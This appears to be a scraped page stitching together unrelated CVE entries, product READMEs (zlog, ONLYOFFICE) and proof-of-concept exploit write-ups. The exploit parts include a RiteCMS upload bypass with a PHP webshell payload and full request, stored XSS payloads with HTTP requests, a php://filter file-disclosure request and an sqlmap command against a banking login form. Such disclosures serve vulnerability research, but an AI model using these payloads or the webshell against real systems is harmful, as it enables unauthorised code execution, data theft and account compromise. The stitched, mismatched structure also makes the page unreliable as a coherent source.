A Buffer Overflow vulnerability exists in zlog 1.2.15 via zlog_conf_build_with_file in src/zlog/src/conf.c.

0.  What is zlog?

zlog is a reliable, high-performance, thread safe, flexible, clear-model, pure C logging library.

Actually, in the C world there was NO good logging library for applications like logback in java or log4cxx in c++. Using printf can work, but can not be redirected or reformatted easily. syslog is slow and is designed for system use. So I wrote zlog. It is faster, safer and more powerful than log4c. So it can be widely used.

1.  Install

Downloads: https://github.com/HardySimpson/zlog/releases

    $ tar -zxvf zlog-latest-stable.tar.gz
    $ cd zlog-latest-stable/
    $ make 
    $ sudo make install
    

or

    $ make PREFIX=/usr/local/
    $ sudo make PREFIX=/usr/local/ install
    

PREFIX indicates the installation destination for zlog. After installation, refresh your dynamic linker to make sure your program can find zlog library.

    $ sudo vi /etc/ld.so.conf
    /usr/local/lib
    $ sudo ldconfig
    

Before running a real program, make sure libzlog.so is in the directory where the system's dynamic lib loader can find it. The command metioned above are for linux. Other systems will need a similar set of actions.

2.  Introduce configure file

There are 3 important concepts in zlog: categories, formats and rules.

Categories specify different kinds of log entries. In the zlog source code, category is a (zlog\_cateogory\_t \*) variable. In your program, different categories for the log entries will distinguish them from each other.

Formats describe log patterns, such as: with or without time stamp, source file, source line.

Rules consist of category, level, output file (or other channel) and format. In brief, if the category string in a rule in the configuration file equals the name of a category variable in the source, then they match. Still there is complex match range of category. Rule decouples variable conditions. For example, log4j must specify a level for each logger(or inherit from father logger). That's not convenient when each grade of logger has its own level for output(child logger output at the level of debug, when father logger output at the level of error)

Now create a configuration file. The function zlog\_init takes the files path as its only argument. $ cat /etc/zlog.conf

    [formats]
    simple = "%m%n"
    [rules]
    my_cat.DEBUG    >stdout; simple
    

In the configuration file log messages in the category "my\_cat" and a level of DEBUG or higher are output to standard output, with the format of simple(%m - usermessage %n - newline). If you want to direct out to a file and limit the files maximum size, use this configuration

    my_cat.DEBUG            "/var/log/aa.log", 1M; simple
    

3.  Using zlog API in C source file

    $ vi test_hello.c
    
    #include <stdio.h> 
    
    #include "zlog.h"
    
    int main(int argc, char** argv)
    {
    	int rc;
    	zlog_category_t *c;
    
    	rc = zlog_init("/etc/zlog.conf");
    	if (rc) {
    		printf("init failed\n");
    		return -1;
    	}
    
    	c = zlog_get_category("my_cat");
    	if (!c) {
    		printf("get cat fail\n");
    		zlog_fini();
    		return -2;
    	}
    
    	zlog_info(c, "hello, zlog");
    
    	zlog_fini();
    
    	return 0;
    } 
    

4.  Compile, and run it!

    $ cc -c -o test_hello.o test_hello.c -I/usr/local/include
    $ cc -o test_hello test_hello.o -L/usr/local/lib -lzlog -lpthread
    $ ./test_hello
    hello, zlog
    

5.  Advanced Usage

*   syslog model, better than log4j model
*   log format customization
*   multiple output destinations including static file path, dynamic file path, stdout, stderr, syslog, user-defined output
*   runtime manually or automatically refresh configure(safely)
*   high-performance, 250'000 logs/second on my laptop, about 1000 times faster than syslog(3) with rsyslogd
*   user-defined log level
*   thread-safe and process-safe log file rotation
*   microsecond accuracy
*   dzlog, a default category log API for easy use
*   MDC, a log4j style key-value map
*   self debuggable, can output zlog's self debug&error log at runtime
*   No external dependencies, just based on a POSIX system and a C99 compliant vsnprintf.

**6.Links:**

*   Homepage: http://hardysimpson.github.com/zlog
*   Downloads: https://github.com/HardySimpson/zlog/releases
*   Author's Email: HardySimpson1984@gmail.com
*   auto tools version: https://github.com/bmanojlovic/zlog
*   cmake verion: https://github.com/lisongmin/zlog
*   windows version: https://github.com/lopsd07/WinZlog

CVE-2021-43521: GitHub - HardySimpson/zlog: A reliable, high-performance, thread safe, flexsible, clear-model, pure C logging library.

RiteCMS version 3.1.0 and below suffers from a remote code execution vulnerability in the admin panel. An authenticated attacker can upload a PHP file and bypass the .htacess configuration to deny execution of .php files in media and files directory by default.

\# Exploit Title: RiteCMS - File Upload Restriction Bypass to Remote Code Execution (Authenticated) \# Date: 2021-07-25 \# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) \# Vendor Homepage: https://ritecms.com/ \# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip \# Version: <= 3.1.0 \# Tested on: Windows 10, Ubuntu 18, XAMPP \# Google Dork: intext:"Powered by RiteCMS" \# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ \# Description # ################ \# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. \# There are 4 ways of bypassing the current file upload protection to achieve remote code execution. \# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved \# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved \# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. Intercept the request, modify file\_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file\_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php \# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" - RCE achieved $ cat .htaccess <Files \*.php> deny from all </Files> <Files ~ "webshell\\.php$"> Allow from all </Files> ################################### \# PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1\. Login as admin 2\. Go to Files Manager 3\. Choose a directory to upload .php file either media or files directory. 4\. Then, click Upload file > Browse.. 3\. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4\. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: \======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($\_GET\[base64\_decode('Y21k')\]);?> \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file\_name" \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_mode" 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize" 150 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_compression" 70 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_file\_submit" OK - Upload file \-----------------------------410923806710384479662671954309-- #################### \# Webshell access: # #################### \# Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id \# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """

CVE-2021-46367: RiteCMS version 3.1.0 suffers from a remote code execution in admin panel

A cross-site scripting (XSS) vulnerability in ONLYOFFICE Document Server Example before v7.0.0 allows remote attackers inject arbitrary HTML or JavaScript through /example/editor.

![License](https://camo.githubusercontent.com/1ba1bcada55e01a77a091378cf9e310b9ce0731398e46c0564d5e1c9c8649856/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f4c6963656e73652d474e552532304147504c25323056332d677265656e2e7376673f7374796c653d666c6174) ![Release](https://camo.githubusercontent.com/20564517469ab8bfb943268c72c7aeffee17d570dd229555b7a08092c82eeeee/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f52656c656173652d76372e302e302d626c75652e7376673f7374796c653d666c6174)

**Overview**

ONLYOFFICE Document Server is a free collaborative online office suite comprising viewers and editors for texts, spreadsheets and presentations, fully compatible with Office Open XML formats: .docx, .xlsx, .pptx and enabling collaborative editing in real time.

Starting from version 6.0, Document Server is distributed under a new name - ONLYOFFICE Docs.

ONLYOFFICE Docs can be used as a part of ONLYOFFICE Workspace or with third-party sync&share solutions (e.g. Nextcloud, ownCloud, Seafile) to enable collaborative editing within their interface.

It has three editions - Community, Enterprise, and Developer.

**Components**

ONLYOFFICE Document Server contains the following components:

*   server - the backend server software layer which is the base for all other components of ONLYOFFICE Document Server.
*   core - server core components of ONLYOFFICE Document Server which enable the conversion between the most popular office document formats (DOC, DOCX, ODT, RTF, TXT, PDF, HTML, EPUB, XPS, DjVu, XLS, XLSX, ODS, CSV, PPT, PPTX, ODP).
*   sdkjs - JavaScript SDK for the ONLYOFFICE Document Server which contains API for all the included components client-side interaction.
*   web-apps - the frontend for ONLYOFFICE Document Server which builds the program interface and allows the user create, edit, save and export text, spreadsheet and presentation documents using the common interface of a document editor.
*   dictionaries - the dictionaries of various languages used for spellchecking in ONLYOFFICE Document Server.
*   sdkjs-plugins - the add-ons for ONLYOFFICE Document Server used for the developers to add specific functions to the editors which are not directly related to the OOXML format.

**Functionality**

ONLYOFFICE Document Server includes the following editors:

*   ONLYOFFICE Document Editor
*   ONLYOFFICE Spreadsheet Editor
*   ONLYOFFICE Presentation Editor

The editors allow you to create, edit, save and export text, spreadsheet and presentation documents and additionally have the features:

*   Collaborative editing
*   Hieroglyph support
*   Reviewing
*   Spell-checking

**ONLYOFFICE Document Server editions**

ONLYOFFICE offers different versions of its online document editors that can be deployed on your own servers.

ONLYOFFICE Docs (packaged as Document Server):

*   Community Edition (`onlyoffice-documentserver` package)
*   Enterprise Edition (`onlyoffice-documentserver-ee` package)
*   Developer Edition (`onlyoffice-documentserver-de` package)

The table below will help you to make the right choice.

Pricing and licensing

Community Edition

Enterprise Edition

Developer Edition

Get it now

Start Free Trial

Start Free Trial

Cost

FREE

Go to the pricing page

Go to the pricing page

Simultaneous connections

up to 20 maximum

As in chosen pricing plan

As in chosen pricing plan

Number of users

up to 20 recommended

As in chosen pricing plan

As in chosen pricing plan

Clusterization

\-

+

+

License

GNU AGPL v.3

Proprietary

Proprietary

**Support**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Documentation

Help Center

Help Center

Help Center

Standard support

GitHub or paid

One year support included

One year support included

Premium support

Contact Us

Contact Us

Contact Us

**Services**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Conversion Service

+

+

+

Document Builder Service

+

+

+

**Interface**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Tabbed interface

+

+

+

Dark theme

+

+

+

125%, 150%, 175%, 200% scaling

+

+

+

White label

\-

\-

+

Integrated test example (node.js)

+

+

+

Mobile web editors

\-

+\*

+\*

**Plugins & Macros**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Plugins

+

+

+

Macros

+

+

+

**Collaborative capabilities**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Two co-editing modes

+

+

+

Comments

+

+

+

Built-in chat

+

+

+

Review and tracking changes

+

+

+

Display modes of tracking changes

+

+

+

Version history

+

+

+

**Document Editor features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Font and paragraph formatting

+

+

+

Object insertion

+

+

+

Adding Content control

+

+

+

Editing Content control

+

+

+

Layout tools

+

+

+

Table of contents

+

+

+

Navigation panel

+

+

+

Mail Merge

+

+

+

Comparing Documents

+

+

+

**Spreadsheet Editor features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Font and paragraph formatting

+

+

+

Object insertion

+

+

+

Functions, formulas, equations

+

+

+

Table templates

+

+

+

Pivot tables

+

+

+

Data validation

+

+

+

Conditional formatting

+

+

+

Sparklines

+

+

+

Sheet Views

+

+

+

**Presentation Editor features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Font and paragraph formatting

+

+

+

Object insertion

+

+

+

Transitions

+

+

+

Presenter mode

+

+

+

Notes

+

+

+

**Form creator features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

Adding form fields

+

+

+

Form preview

+

+

+

Saving as PDF

+

+

+

**Security features**

**Community Edition**

**Enterprise Edition**

**Developer Edition**

End-to-end encryption via Private Rooms

+

+

\-

Get it now

Start Free Trial

Start Free Trial

\* If supported by DMS

**Documentation**

The easiest way to install ONLYOFFICE Document Server is to use the Docker image. You can also install it from the repository or compile it from source code. The following documentation is available to the community depending on the way you choose:

*   Compiling ONLYOFFICE Document Server for a local server
*   Installing ONLYOFFICE Document Server Linux version
*   Installing ONLYOFFICE Document Server Windows version
*   Installing ONLYOFFICE Document Server Docker version

**ONLYOFFICE Workspace**

ONLYOFFICE Docs packaged as Document Server is a part of **ONLYOFFICE Workspace** that also includes ONLYOFFICE Groups packaged as Community Server, Mail Server, Control Panel and Talk (instant messaging app).

It can also be integrated with third-party sync and share solutions.

**Project information**

Official website: https://www.onlyoffice.com

Code repository: https://github.com/ONLYOFFICE/DocumentServer

Docker Image: https://github.com/ONLYOFFICE/Docker-DocumentServer

License: GNU AGPL v3.0

ONLYOFFICE Docs on official website: https://www.onlyoffice.com/office-suite.aspx

ONLYOFFICE Workspace on official website: https://www.onlyoffice.com/workspace.aspx

List of available integrations: https://www.onlyoffice.com/all-connectors.aspx

**User Feedback and Support**

If you have any problems with or questions about ONLYOFFICE Document Server, please visit our official forum to find answers to your questions: forum.onlyoffice.com or you can ask and answer ONLYOFFICE development questions on Stack Overflow.

CVE-2022-24229: GitHub - ONLYOFFICE/DocumentServer: ONLYOFFICE Document Server is an online office suite comprising viewers and editors for texts, spreadsheets and presentations, fully compatible with Office Open XML

Social Codia SMS v1 was discovered to contain an arbitrary file upload vulnerability via addteacher.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27349: GitHub - D4rkP0w4r/sms-Unrestricted-File-Upload-RCE-POC

Ecommerce-Website v1 was discovered to contain an arbitrary file upload vulnerability via /customer_register.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27357: CVEs/POC.md at main · D4rkP0w4r/CVEs

Musical World v1 was discovered to contain an arbitrary file upload vulnerability via uploaded_songs.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27064: GitHub - D4rkP0w4r/Musical-World-Unrestricted-File-Upload-RCE-POC

AeroCMS v0.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via view_all_comments.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.

**AeroCMS-Comment-Stored\_XSS-POC**

*   `Note` => Don't need register or login account
*   `Description` => `Stored_XSS` at comment box

**Step to Reproduct**

*   Click `Read More` -> input payload `<img/src/onerror=prompt(10)>` at `Author` -> click `Submit` button

**Exploit****Vulnerable Code****POC**

*   `Injection Point`

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

*   `Request`

POST /AeroCMS/post.php?p\_id=36 HTTP/1.1
Host: localhost:8080
Content-Length: 126
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/AeroCMS/post.php?p\_id=36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441
Connection: close

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

`POC VIDEO` https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing

CVE-2022-27063: GitHub - D4rkP0w4r/AeroCMS-Comment-Stored_XSS-Poc

Social Codia SMS v1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Title text field.

**sms-Add\_Student-Stored\_XSS-POC**

Description => Stored\_XSS at `Add Student`

**Step to Reproduct**

*   Login to admin -> `Students` -> `Add Student` -> input payload `<img/src/onerror=prompt(10)>` at `Enter Name`

**Exploit**

![image](https://user-images.githubusercontent.com/79050415/158715096-7fe6c540-b7cb-4293-b60f-f0e16b6d445c.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/158716291-52718f20-b719-44ef-a9ca-21b00e82b2de.png)

*   When inserting into the database, the input is not filtered out bad characters

**POC**

*   `Injection Point`

\------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>

*   `Request`

POST /sms/admin/addstudent.php HTTP/1.1
Host: localhost:8080
Content-Length: 992
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sms/admin/addstudent.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k
Connection: close

------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="image"; filename="car.png"
Content-Type: application/octet-stream


------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="rollno"

1234567
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="contact"

123456
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="standerd"

1
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="city"

Newyork
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="email"

haha@gmail.com
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="gender"

male
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryAvKt9LM2RnnkuA0K--

`POC VIDEO` https://drive.google.com/file/d/1PLRmIi7EBMAXkLMUhUy09PVph1CW6otF/view?usp=sharing

CVE-2022-27348: GitHub - D4rkP0w4r/sms-Add_Student-Stored_XSS-POC

Movie Seat Reservation v1 was discovered to contain an unauthenticated file disclosure vulnerability via /index.php?page=home.

Permalink

Cannot retrieve contributors at this time

**Movie Seat Reservation System File Disclosure**

*   `Note` => don't need login

**Exploit**

*   Exploit with Burp Suite

http://192.168.1.101:8080/Movie\_Seat\_Reservation\_System/index.php?page\=home

![image](https://user-images.githubusercontent.com/79050415/160242883-2539e290-9b33-4267-a38b-a2d37563b0a2.png)

*   Use Burp Suite capture request and payload => `Send` ![image](https://user-images.githubusercontent.com/79050415/160242922-7c29a7ac-787f-47b8-9052-6c5c2d7495cb.png)
*   Then decode `Base64`

 PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg\==    

![image](https://user-images.githubusercontent.com/79050415/160243014-eff96877-37c4-41ba-b4ed-0359cbbece7b.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160243179-1a4d1053-eb75-4a8c-9965-52d3eaeb5b18.png)

*   `Request`

GET /Movie\_Seat\_Reservation\_System/index.php?page\=php://filter/convert.base64\-encode/resource\=admin/db\_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Referer: http://192.168.1.101:8080/Movie\_Seat\_Reservation\_System/
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en;q\=0.9
Cookie: PHPSESSID\=0722dtqnb1dgvuono8uubajcae
Connection: close

CVE-2022-28002: CVEs/POC.md at main · D4rkP0w4r/CVEs

Online Banking System in PHP v1 was discovered to contain multiple SQL injection vulnerabilities at /staff_login.php via the Staff ID and Staff Password parameters.

Permalink

Cannot retrieve contributors at this time

**Online Banking System SQL Injection**

*   `Description` => sql injection at `staff_login.php`

**Step to Reproduct**

*   `Staff Login` -> `Staff ID` \-> `Staff Password` -> `Login` -> `modify data` -> `Sqlmap`

**Exploit**

python3 sqlmap.py -r sqli.txt --batch --current-user

![image](https://user-images.githubusercontent.com/79050415/159328722-52415c05-ed4a-405b-ae9f-919692f58601.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/159329104-f6734379-6e0f-4344-a7a9-d4baa41d2e34.png)

*   No filter `Staff ID` and `Staff Password` when inserting data to database

**Information Disclosure**

![image](https://user-images.githubusercontent.com/79050415/159337062-c4045649-7665-4691-9a51-3d41d502d14e.png)

`Injection Point`

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

*   `Request`

POST /Online-Banking/staff\_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff\_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

Tag

#windows